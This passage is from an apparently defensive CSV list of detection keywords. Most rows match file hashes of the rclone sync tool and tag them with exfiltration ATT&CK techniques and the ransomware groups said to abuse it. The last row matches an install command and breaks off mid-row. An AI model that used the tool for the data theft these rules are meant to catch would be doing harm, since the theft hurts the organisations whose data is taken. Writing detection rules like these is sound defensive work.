"*ca04fa1151686619776a2009397dc9aad61975155412527638072302ea850c68*",".{0,1000}ca04fa1151686619776a2009397dc9aad61975155412527638072302ea850c68.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ca1cb4b1d9a3e45d0704aa77651b0497eacc3e415192936a5be7f7272f2c94c5*",".{0,1000}ca1cb4b1d9a3e45d0704aa77651b0497eacc3e415192936a5be7f7272f2c94c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ca528c7f40b7045ff516dc9758442d05010b84b4b3eab58281325f2e1a0f2b74*",".{0,1000}ca528c7f40b7045ff516dc9758442d05010b84b4b3eab58281325f2e1a0f2b74.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ca62758a8fca83e129d46d3105fd8a435c16e4f534ed662b04a4aca99b92b1e7*",".{0,1000}ca62758a8fca83e129d46d3105fd8a435c16e4f534ed662b04a4aca99b92b1e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ca647f69c6bf2e831902a8bd9c5f4d16f7014314d5eeb94bd3a5389a92806de8*",".{0,1000}ca647f69c6bf2e831902a8bd9c5f4d16f7014314d5eeb94bd3a5389a92806de8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cabf1c59455c1447264baefba68d2a1a45d9a39a6ffbd8420c3b8c2ffda357a3*",".{0,1000}cabf1c59455c1447264baefba68d2a1a45d9a39a6ffbd8420c3b8c2ffda357a3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cac807c7a75909e5f8ce610b29078a2f5cce0d35a4ccdeface0d5c6809f0856c*",".{0,1000}cac807c7a75909e5f8ce610b29078a2f5cce0d35a4ccdeface0d5c6809f0856c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cadf80a863dc5b1e8222141517ffebe93bec28214dfa7d69407b98409355888d*",".{0,1000}cadf80a863dc5b1e8222141517ffebe93bec28214dfa7d69407b98409355888d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cb34300ac60c5a08687352721f380e736d6d3bad2e514866d27f9c581f1c19aa*",".{0,1000}cb34300ac60c5a08687352721f380e736d6d3bad2e514866d27f9c581f1c19aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cb7edcda37ef188dd5461a626f7b66d4c76676bc4cf05cba3bb4850dff3d8a2b*",".{0,1000}cb7edcda37ef188dd5461a626f7b66d4c76676bc4cf05cba3bb4850dff3d8a2b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cbb99174020be2e0d753674e303f2cfbc81d5f24b85c7c2f5c57ac5411720500*",".{0,1000}cbb99174020be2e0d753674e303f2cfbc81d5f24b85c7c2f5c57ac5411720500.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cbfa238232604e51fb4d47e27865ffb1fb993141634e249b246a0323ec3b1b4e*",".{0,1000}cbfa238232604e51fb4d47e27865ffb1fb993141634e249b246a0323ec3b1b4e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cbfeba0eec5935a088047fbb04249aeeeef35ea08f9eabfa0f6fadd113b6b522*",".{0,1000}cbfeba0eec5935a088047fbb04249aeeeef35ea08f9eabfa0f6fadd113b6b522.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cc0790a4988d294fbd9b971b3873b3cd48f4fd89bf2f23906b81f28f07c6d971*",".{0,1000}cc0790a4988d294fbd9b971b3873b3cd48f4fd89bf2f23906b81f28f07c6d971.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cc13a80a78d9a3b77899ba4a01c32c7c8034e6f06c8f4815411ddaac42e79ccf*",".{0,1000}cc13a80a78d9a3b77899ba4a01c32c7c8034e6f06c8f4815411ddaac42e79ccf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cc60aad6d5c0055d8f7d2711da000ca0d487f0fe43543977b248d5fbd95eb1f6*",".{0,1000}cc60aad6d5c0055d8f7d2711da000ca0d487f0fe43543977b248d5fbd95eb1f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cc6356a6eb77a46e8d09d594d606a84d51b940023cefc616fb7d05faa36fd41f*",".{0,1000}cc6356a6eb77a46e8d09d594d606a84d51b940023cefc616fb7d05faa36fd41f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ccb13df8ba3d04697a15c8139018b213468ca3b51d725e5da173d516ee581b95*",".{0,1000}ccb13df8ba3d04697a15c8139018b213468ca3b51d725e5da173d516ee581b95.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ccd172f56541f0e08ef45066fadc2b75df8afe5e63869980f3dd921ff9c027ee*",".{0,1000}ccd172f56541f0e08ef45066fadc2b75df8afe5e63869980f3dd921ff9c027ee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cd244dfaba5789845405fe15f8290113d7ae87540d228c2bdea105f0351ca270*",".{0,1000}cd244dfaba5789845405fe15f8290113d7ae87540d228c2bdea105f0351ca270.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cd38d27257bae0c4ff848fe924dc17d032f66032cd017d7e22b3b60457611269*",".{0,1000}cd38d27257bae0c4ff848fe924dc17d032f66032cd017d7e22b3b60457611269.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cd5dfb6374d84f6404352daf9fa4f0a788520a433f64b7df427f0fd4e1cb3c6a*",".{0,1000}cd5dfb6374d84f6404352daf9fa4f0a788520a433f64b7df427f0fd4e1cb3c6a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cdb048f2bfd02f40df74c87a94add49a9e1625ae31e37d7b478ddeebbbaa288a*",".{0,1000}cdb048f2bfd02f40df74c87a94add49a9e1625ae31e37d7b478ddeebbbaa288a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cdbe02812448aad7bf45b444a2d186a164af3c7275fd404ece8f93065fd33958*",".{0,1000}cdbe02812448aad7bf45b444a2d186a164af3c7275fd404ece8f93065fd33958.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cddf06841ab4e00c5904081b9ce4a8cbd610d9b10fb324ffdde7beb4ed7488e9*",".{0,1000}cddf06841ab4e00c5904081b9ce4a8cbd610d9b10fb324ffdde7beb4ed7488e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ce2af789fd2484320375766e2ecf96e7aecba5fa3d589b9462d7d251d322d532*",".{0,1000}ce2af789fd2484320375766e2ecf96e7aecba5fa3d589b9462d7d251d322d532.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ce4adcbf74d8dff4dbc1658d4a4ba75f65c18f40be166e0482b9deefe6eb87cb*",".{0,1000}ce4adcbf74d8dff4dbc1658d4a4ba75f65c18f40be166e0482b9deefe6eb87cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ceb97d1ab5525c1d833ca8bc63276818ed3065832fc0a23702f308b9a2c256fb*",".{0,1000}ceb97d1ab5525c1d833ca8bc63276818ed3065832fc0a23702f308b9a2c256fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cec7da1735babcd6cdd3f77e64b1eb14963a3ff3d6da825439e1c1e43dc75007*",".{0,1000}cec7da1735babcd6cdd3f77e64b1eb14963a3ff3d6da825439e1c1e43dc75007.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ced457dd55d9feb120aaf301915be097aab3a0a42e26a9e9f4d3023c1b84cb8a*",".{0,1000}ced457dd55d9feb120aaf301915be097aab3a0a42e26a9e9f4d3023c1b84cb8a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cf1327f3776cf7b4398a7984f602e78cc1976520d018933555c11bf538d21654*",".{0,1000}cf1327f3776cf7b4398a7984f602e78cc1976520d018933555c11bf538d21654.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cf4f53ce90255cd73ce5ad88865cc2239d96f51bd71b4fd109d6d08aabfe1b50*",".{0,1000}cf4f53ce90255cd73ce5ad88865cc2239d96f51bd71b4fd109d6d08aabfe1b50.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cfb47bb4ee8119eaf61f1c2a34226e74af91c22485760bfd1f2209852bfbbf7f*",".{0,1000}cfb47bb4ee8119eaf61f1c2a34226e74af91c22485760bfd1f2209852bfbbf7f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cfb8075c16ed227876a923bbc3c6f5e5311db40f730e2154501512f72a9ad5b2*",".{0,1000}cfb8075c16ed227876a923bbc3c6f5e5311db40f730e2154501512f72a9ad5b2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*cfe2c39137630a2138ab970e5313c27210527c0fcbc583f328508d8b956edfb9*",".{0,1000}cfe2c39137630a2138ab970e5313c27210527c0fcbc583f328508d8b956edfb9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*choco install rclone*",".{0,1000}choco\sinstall\srclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - 
